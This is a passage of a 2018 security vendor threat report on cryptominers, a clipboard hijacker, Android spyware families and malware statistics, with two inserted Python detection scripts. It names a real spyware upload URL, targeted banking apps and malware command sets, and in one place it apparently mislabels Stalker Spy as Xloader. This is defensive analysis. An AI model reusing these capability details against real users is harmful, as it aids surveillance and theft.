Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.


Global Threat Report Q2 2018 Edition

Page 22 of 73

Some cryptominers attracted the attention of the mass media and cybersecurity researchers, which made them easier for users to detect. In Q2 these cryptominers learned to hide; CoinHive is the clearest example.

3.4 CoinHive changes its skin

CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.

As you can see, the CoinHive script is easily detected.

The CoinHive script

After many publications on this subject in the mass media and in cybersecurity reports, users started checking website code for cryptominers. But in the second quarter perpetrators found a way to overcome this obstacle: they now use a sneaky trick to camouflage the presence of CoinHive with URL shorteners.


As a result, the malicious code on a webpage looks like this:

The obfuscated malicious code on a webpage

If we decode the string, we encounter an iframe:

The iframe loads the URL shortener

Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.

Now let's look at the URL https://cnhv.co.

And there we find the familiar link to CoinHive:

The link to CoinHive


What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any sign of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
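The camouflage described above (an encoded string that decodes to a 1x1 iframe pointing at a URL shortener) is found by decoding a page's script literals before looking for iframes. The scanner below is an added example written for this section, not code from the Comodo report; the constructed sample page, the placeholder short-link path and the small domain watch list are assumptions of the example.

```python
import base64
import re
from urllib.parse import unquote, urlparse

# Domains the report ties to CoinHive: the miner itself and its cnhv.co shortener.
# Constructed watch list for this example; extend it with your own intelligence.
MINER_DOMAINS = {"coinhive.com", "cnhv.co"}

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# String literals handed to atob() / unescape(): the usual one-line camouflage wrappers.
ATOB_RE = re.compile(r"""atob\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)""")
UNESCAPE_RE = re.compile(r"""unescape\(\s*["']((?:%[0-9A-Fa-f]{2}|[^"'])+)["']\s*\)""")


def decode_layers(text, max_depth=3):
    """Return every decoded string literal, peeling nested atob()/unescape() wrappers."""
    layers, pending = [], [text]
    for _ in range(max_depth):
        found = []
        for chunk in pending:
            for m in ATOB_RE.finditer(chunk):
                try:
                    found.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
                except ValueError:  # binascii.Error is a ValueError: not real base64, skip it
                    pass
            for m in UNESCAPE_RE.finditer(chunk):
                found.append(unquote(m.group(1)))
        if not found:
            break
        layers.extend(found)
        pending = found
    return layers


def parse_attrs(attr_text):
    """Parse iframe attributes into a lower-cased dict (quoted or bare values)."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(attr_text)}


def pixels(value):
    """Interpret a width/height attribute; None when it is missing or not numeric."""
    try:
        return float(value.strip().rstrip("px").rstrip("%"))
    except ValueError:
        return None


def find_suspicious_iframes(html):
    """Flag iframes that are effectively invisible (<= 1x1) or point at a known miner domain."""
    findings = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        width, height = pixels(attrs.get("width", "")), pixels(attrs.get("height", ""))
        tiny = width is not None and height is not None and width <= 1 and height <= 1
        src = attrs.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        known = any(host == d or host.endswith("." + d) for d in MINER_DOMAINS)
        if tiny or known:
            findings.append({"src": src, "host": host, "tiny": tiny, "known_miner_domain": known})
    return findings


def scan_page(page):
    """Scan the raw markup plus every decoded script literal, so hidden iframes are not missed."""
    return [f for text in [page] + decode_layers(page) for f in find_suspicious_iframes(text)]


# Constructed sample: a 1x1 iframe to the shortener, hidden inside a base64 document.write().
HIDDEN_IFRAME = '<iframe src="https://cnhv.co/PLACEHOLDER" width="1" height="1"></iframe>'
ENCODED = base64.b64encode(HIDDEN_IFRAME.encode()).decode()
SAMPLE_PAGE = (
    "<html><body><p>Welcome to our site</p>\n"
    f'<script>document.write(atob("{ENCODED}"));</script>\n'
    "</body></html>"
)
# A normal embedded video player should not trigger the rule.
BENIGN_PAGE = '<iframe src="https://example.org/player" width="560" height="315"></iframe>'

if __name__ == "__main__":
    for hit in scan_page(SAMPLE_PAGE):
        print("suspicious iframe:", hit)
```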

The next malware in our list prefers not to mine cryptocurrency but to steal it on the fly.

3.5 Cryptocurrency clipboard hijacker intercepts transfers

It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.

Cryptocurrency transfers require a wallet address. The address is a long string of mixed letters and digits, so it is almost impossible to remember or type in manually. That is why users usually copy-paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a weak point they can use to their advantage.

The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it replaces it with the address of a wallet under the attacker's control. So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.

New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses

This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers, but cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used for spreading different types of malware, clipboard cryptocurrency hijackers among them.

Here is an example of a clipboard hijacker attack:

A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.


An example of a clipboard hijacker attack

Spreading of Clipboard Hijacker malware around the world
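Detection logic for the swap described above, as an added example that is not part of the Comodo report: it replays a constructed clipboard history, flags a wallet address that is replaced by a different address of the same kind within moments of being copied (the hijacker's signature), and checks the Base58Check integrity of the replacement. The address patterns, the two-second window and the snapshot log are assumptions of this example; the two addresses are the ones quoted in the report.

```python
import hashlib
import re

# Recognisers for the address formats a hijacker typically watches for.
# Approximations chosen for this example, not an exhaustive list.
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$"),
    "btc_bech32": re.compile(r"^bc1[02-9ac-hj-np-z]{39,59}$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}
BASE58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def classify(text):
    """Return the address kind of a clipboard string, or None if it is not an address."""
    text = text.strip()
    for kind, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return kind
    return None


def base58check_valid(address):
    """Verify the 4-byte double-SHA256 checksum of a legacy (Base58Check) Bitcoin address.
    A swapped-in attacker address normally passes too; a mistyped or corrupted one does not."""
    n = 0
    for ch in address:
        digit = BASE58_ALPHABET.find(ch)
        if digit < 0:
            return False
        n = n * 58 + digit
    leading_zero_bytes = len(address) - len(address.lstrip("1"))  # each leading '1' is a 0x00 byte
    if leading_zero_bytes >= 25:
        return False
    try:
        body = n.to_bytes(25 - leading_zero_bytes, "big")
    except OverflowError:
        return False
    raw = b"\x00" * leading_zero_bytes + body
    payload, checksum = raw[:21], raw[21:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def detect_swaps(snapshots, window_seconds=2.0):
    """Replay (timestamp, clipboard_text) snapshots and flag hijacker-style replacements:
    an address replaced by a different address of the same kind within the window."""
    alerts = []
    for (t_prev, prev), (t_now, now) in zip(snapshots, snapshots[1:]):
        prev, now = prev.strip(), now.strip()
        kind = classify(prev)
        if kind is None or classify(now) != kind or prev == now:
            continue
        if 0 <= t_now - t_prev <= window_seconds:
            alerts.append({
                "kind": kind,
                "copied": prev,
                "replaced_with": now,
                "delay_seconds": round(t_now - t_prev, 3),
                "replacement_checksum_ok": base58check_valid(now) if kind == "btc_legacy" else None,
            })
    return alerts


# Constructed clipboard history modelled on the report's example: the user copies the
# intended address and the malware rewrites the clipboard a fraction of a second later.
SAMPLE_SNAPSHOTS = [
    (0.0, "meeting notes for Monday"),
    (5.0, "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),   # user copies the intended wallet
    (5.3, "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),   # clipboard silently rewritten: alert
    (60.0, "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),  # later deliberate re-copy: no alert
    (120.0, "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"), # a minute apart, outside the window: no alert
]

if __name__ == "__main__":
    for alert in detect_swaps(SAMPLE_SNAPSHOTS):
        print("possible clipboard hijack:", alert)
```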

Although cryptominers have decreased in number, they are coming back in an updated disguise and promise to become a serious new challenge for cybersecurity departments and vendors.


4 Android Devices Under Siege

4.1 Spying, Stealing, Mining

Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers: today every smartphone contains a plethora of confidential information about its owner.

If the victim is a CEO, politician or other VIP, the content of the mobile device can be sold at the highest prices. Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims. Of course, not only cybercriminals hunt for smartphone content: intelligence agencies and business competitors want to know everything about their targets. Add jealous spouses tracking every move of their partners and parents wanting to control their children, and you will easily understand why Android-oriented malware is a growing business.

Today spying is the number one purpose of Android malware. In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them. You can see the whole family of these digital spooks on the graph.

The digital spooks


Like real-world spies, digital agents impersonate legitimate entities, pretending to be innocent applications or hiding malicious code inside legitimate software. Like real spies, they seek to remain invisible, constantly change disguises to avoid detection, and hone their tradecraft from version to version.

4.1.1 KevDroid

The first is named KevDroid. It is distributed in three versions:

Version-1 Naver Defender

Version-2 Netease Defender

Version-3 PU

Disguises of KevDroid

The first version, disguised as the Naver Defender application, covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection. This sample has multifunctional spying abilities. It steals account details: contacts, id, name, phone numbers and email address of the owner. It grabs SMS messages and associated info. It attempts to read call logs (number, name, type, duration), emails (email, type) and photos of the contacts. After extracting all the data, the malware encrypts it with the AES algorithm and sends it to the attackers' server http://cgalim.com/admin/hr/pu/pu.php?do=upload

KevDroid records the victim's every phone call, then encrypts and uploads it to the cybercriminals' server. In addition, it collects information about currently running services, installed apps and the launcher name.

The second version, Netease Defender, has additional spying abilities. It takes control of the device camera and covertly records the victim's activity, then sends the video to the attackers' server.

Version-3 of KevDroid takes photos, records calls and creates a list of files on the device. It also extracts the web history, account and contact details, and the device information.

People assume they are safe if they download apps exclusively from the official Google Play store. This wrong assumption can be costly: the first version of the Desert Scorpion spyware was spread via official Google Play Services. The spyware was camouflaged as a chat app called Dardesh Instant App. But when a user downloaded and ran it, the app covertly connected to the cybercriminals' Command and Control server and downloaded the spyware onto the device. From that moment the spyware constantly kept track of all events on the infected device. Another means of malware dissemination was social networks.

Version-1 Dardesh Google Play Services Instant Apps

Version-2 Settings

Disguises of Desert Scorpion

The second version of Desert Scorpion records calls, audio and video, uninstalls other apps, sends and receives messages, and tracks the location of the smartphone. It is included in some spyware tools like FinSpy and Pegasus. Beyond the capabilities of the first version, it collects information about installed applications, extracts metadata and makes changes on the victim device.


4.1.2 Zoo Park

The next member of the spy family, Zoo Park, has 4 different versions:

Version-1 Telegram Groups انتخاب دھم

Version-2 Postrall Yes For Referendum انتخاب دھم

Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机

Version-4 VPN Easy DroFirewall m_android

Disguises of Zoo Park

The first version tries to impersonate the Telegram app. It extracts account and contact details, encodes them with Base64 and sends them to the attackers' server. The second version has additional abilities: extracting SMS details, device information (including IMEI, network operator name, SDK version, OS version, etc.), call log details and external storage content.

The third version is included in spyware named "Spymaster Pro" and can:

Enable and disable the GPS services

Record audio and send it to the Command & Control server

Upload image files

Collect information about the applications installed

Collect browser's data

Send SMS and read outgoing SMS

The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy, DroFirewall, etc. In addition to the abilities of the previous versions, it includes some additional tricks:

Extracts photos, audio and videos

Records the screen

Executes shell commands

Records calls

4.1.3 MikeSpy

Some spyware samples specifically hunt for messengers' data, like the next digital spook, MikeSpy.

Virtual Girlfriend

Disguises of MikeSpy

MikeSpy camouflages itself as a Virtual Girlfriend application. But instead of a girlfriend, it brings a bundle of malicious abilities:

Takes control over Bluetooth Adapter

Extracts data about accounts contacts details installed apps

Extracts data from the WhatsApp Message DB and related keys

Uploads collected data to the cybercriminals' server via FTP

4.1.4 Xloader

The next spyware, Xloader, combines spying with a purposeful hunt for banking applications on the device. It has trust-inspiring cover icons imitating Facebook and Google Chrome.

Version-1 to Version-3 FaceBook Chrome

Disguises of Xloader


After infection, Xloader connects to its C&C server and executes the following commands:

Extract the device information

Delete SMS

Set ringer mode

Monitor incoming SMS messages

Clear memory

Check for the presence of the following banking applications: com.wooribank.pib.smart, com.kbstar.kbbank, com.ibk.neobanking, com.sc.danb.scbankapp, com.shinhan.sbanking, com.hanabank.ebk.channel.android.hananbank, nh.smart, com.epost.psf.sdsi, com.kftc.kjbsmb, com.smg.spbs

Extract contacts details

Set Wi-Fi always turned on

Version 2 can execute additional commands

Send SMS and read outgoing SMS

Enable and disable a Wi-Fi connection

Access to a location specified by attackers

Make records

Make calls

4.1.5 Stalker Spy

The next malware in our list is Stalker Spy. As you can see, it is a champion in the number of masks it puts on to deceive users.

App Distribution

FlexiSpy MBackup

HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service


Mobile Spy

随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z

CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻

Disguises of Stalker Spy

In addition to the usual must-have spyware feature set, Xloader can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.

4.1.6 Mystery Bot

The next malware is much more than a spy. The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to the C&C server of the Locky bot. The second version of Mystery Bot is ransomware that encrypts files on external storage; after encryption the malware deletes the original files. So we can call it a spy with a "007 license".

Version 1 Adobe Flash Player

Version2 Flash Player

Disguises of Mystery Bot

Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some of the commands that the malware can execute on your device:


Send_SMS - extract SMS content and send it to the C&C server

Send_USSD - send the USSD to the C&C server

Gethistory - monitor browser history

Start_AllApp - gather info about installed applications

Send_call - set the Intent action to call

Forward_call - forward incoming calls

ResForward_call - reset call forwarding

Go_Smsmnd - delete SMS content

Go_GetAlls - get SMS history

Dell_sms - delete SMS content in a conversation

Send_spam - send spam SMS

Start_Inject - call the injectors class

4.1.7 FakeSpy

FakeSpy also has many masks, which you can see in the screenshot.

佐川急便 현대캐피탈

Disguises of FakeSpy

It collects available information from the infected device and sends it to C&C servers. It also checks for the following banking applications: aucomapp, softbankcomapp, docomocomapp

Here are some commands from its Command and Control server:

contacts - Get contact details and email id

Mute - Set action to mute

Mms - Get MMS content

info - Get device information


4.1.8 RedAlert

RedAlert changes multiple "spy legends" to gain users' trust. It wears masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.

Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber

Version_2 Update Google Market Flash Player Tactic FlashLight

Disguises of RedAlert

RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:

de.postbank.finanzassistent

pl.mbank

aib.ibank.android

The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.

4.1.9 Hero Rat

The next digital spook, Hero Rat, mostly operates on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.

Version 1

CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره

Proxy دوست یاب Telegram Ton


شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان

Disguises of Hero Rat

Its code is available on a Telegram hacking channel. Notably, it is sold in three options: bronze, silver and gold.

After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.

Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.

4.1.10 Sonvpay

The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.

Version 1

Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot

Reccoder-Call QRCodeBar Scanner APK

Let me love you ringtone Iphone Ringtone Night light

Beauty camera-Photo editor Shape of you ringtone

Disguises of Sonvpay


Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip option". If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.

It comes to victims in the variety of disguises shown in the figure.

4.1.11 CoinHive

And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of which updates its mining potential. It is disseminated via the counterfeit apps you see below, but one of the vectors is especially interesting.

Version-1 Netflix Hack Instagram Hack

Version-2 TSF Launcher

Version-3 Android Service PlacarTv Futebol Ao Vivo

Disguises of CoinHive

The malware is covertly propagated via ... another cryptominer named CoinMiner.

How is this possible? Let's imagine a cybercriminal who wants to infect her victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.

This story clearly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.

4.2 Android Malware Catalogued by Month

Below you will find detailed statistics on Android-targeted malware by month.

4.2.1 April 2018

Android-targeted malware in April

4.2.2 May 2018

Android-targeted malware in May

4.2.3 June 2018

Android-targeted malware in June


5 Malware in Q2 2018: The Big Picture

Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.


5.1 Strategic Threat: Computer Worms

A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial of service. For this Q2 2018 report we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.


5.1.1 Generic Worms

This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.

Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.

The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.

And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.


5.1.2 Net Worms

A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.

In Q2 2018 Allaple was the most common Net Worm detected, which Microsoft describes as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.

The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.

The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.


5.1.3 Email Worms

Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.

This quarter the most common Email Worm by far was Runonce.

The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).

This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.


5.1.4 p2p Worms

A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.

Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects .exe and .scr files and may leverage the Gnutella p2p network protocol to distribute copies of itself.

The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.

And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many.


5.1.5 IM Worms

Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.

During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.

This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.

This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.


5.2 High Threat Malware

In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.


5.2.1 Backdoors

A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.

The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.

The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.

The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.


5.2.2 Viruses

A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.

Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives, such as USB flash drives.

The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.

This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.


5.2.3 Trojans

Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.

In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".

The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.

And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.


5.2.4 Exploits

Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).

The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.

In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.

Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.


5.3 Medium Threat Malware

In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.


5.3.1 Constructor

Constructors are applications that can be used to automatically create malware files.

For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.

In Q2 Germany (de) was the top country of detection for Constructors.

And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.


5.3.2 Packers

Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.

MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.

In Q2 2018 Russia was the #1 home of malware Packers.

This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.


5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.


5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.


5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.


5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.


5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application", or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.


5.4.2 Unwanted Applications

The unwanted application category is alarming because, in the course of ordinary computer and Internet activity, users often install these applications inadvertently. Examples include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such software includes free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.


5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs that are in fact frequently leveraged by coders and hackers with malicious intent. They often claim to help users with administrative or security functionality but do the opposite; examples include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed with additional malware that users install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are number 2 and 3 respectively.

